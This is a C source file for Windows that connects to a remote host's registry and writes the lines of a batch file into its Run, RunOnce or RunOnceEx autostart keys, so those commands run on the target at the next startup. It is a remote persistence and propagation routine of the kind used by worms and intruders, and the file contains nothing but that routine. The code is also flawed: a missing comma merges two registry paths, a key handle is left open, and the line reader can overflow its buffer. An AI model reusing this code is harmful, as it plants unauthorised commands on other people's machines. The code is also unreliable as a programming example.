#include <windows.h>
#include <stdio.h>
#include <assert.h>
#include "makeipc.pt"
#include "regwrite.pt"

#define	NUM_KEYS			sizeof(szRegKeys)/sizeof(szRegKeys[0])
LPCSTR	szRegKeys[] =
{
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx"
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
};


/*
	RegRemoteInject

	Injects a series of registry values into the passed
	host's RunOnce or RunOnceEx keys.  Currently, the
	values are just the array above.  They are inserted
	with sequential names like "h1".."hN".

	Returns TRUE if ANY key was written successfully.
*/
BOOL RegRemoteInject( LPSTR lpszHost, LPSTR lpszBatchFile )
{
	DWORD	dwErr;
	HKEY	hkStart=NULL, hkTarget;
	int	nIndex;

	// do we get any access at all?
	dwErr = RegConnectRegistry( (LPTSTR)lpszHost, HKEY_LOCAL_MACHINE, &hkStart );
	if( dwErr != ERROR_SUCCESS )
		return FALSE;

	// get a key that will work for our purposes
	hkTarget = RegOpenAcceptableKey( hkStart );
	if( hkTarget )
	{
		BOOL	fSuccess;
		
		// now write out the values
		fSuccess = RegWriteValues( hkTarget, lpszBatchFile );

		RegCloseKey( hkStart );

		return fSuccess;
	}

	RegCloseKey( hkStart );

	return FALSE;
}

/*
	RegOpenAcceptableKey

	Attempts to get access to several keys and returns
	an HKEY to the first available one.
*/
HKEY RegOpenAcceptableKey( HKEY hkStart )
{
	int	nIndex;
	DWORD	dwErr;
	HKEY	hkTarget;

	// loop through the acceptable keys until we find one
	for( nIndex = 0; nIndex < NUM_KEYS; nIndex++ )
	{
		dwErr = RegOpenKeyEx( hkStart, szRegKeys[nIndex], 0, KEY_SET_VALUE, &hkTarget );

		if( dwErr == ERROR_SUCCESS )
			return hkTarget;
	}

	return NULL;
}

/*
	RegWriteValues

	Invents sequential names for an array of values to write
	into a registry key.  Returns FALSE if any error is returned.
*/
BOOL RegWriteValues( HKEY hkTarget, LPSTR lpszBatchFile )
{
	char	szLine[512];
	int	nIndex;
	int	nLen;
	HFILE	hf;

	hf = _lopen( lpszBatchFile, 0 );
	if( hf == -1 )
		return FALSE;

	nLen = ReadLine( hf, szLine );
	for( nIndex = 0; nLen > 0; nIndex++ )
	{
		char	szValueName[20];
		DWORD	dwErr;

		wsprintf( szValueName, "%s%d", (LPSTR)VALUE_PREFIX, nIndex );

		dwErr = RegSetValueEx( hkTarget, szValueName, 0, REG_SZ, szLine, nLen+1 );
		if( dwErr != ERROR_SUCCESS )
			return FALSE;

		nLen = ReadLine( hf, szLine );
	}

	_lclose( hf );

	return TRUE;
}

int PASCAL ReadLine( HFILE hf, LPSTR lpszLine )
{
	char	chGot[3];
	int	nGot;
	int	nResult=0;

	nGot = _lread( hf, chGot, 1 );
	while( (nGot) && (chGot[0] != '\n') )
	{
		if( chGot[0] != 0x0D )
		{
			*lpszLine = chGot[0];
			lpszLine++;
			nResult++;
		}

		nGot = _lread( hf, chGot, 1 );
	}
	
	*lpszLine = '\0';
	return nResult;
}
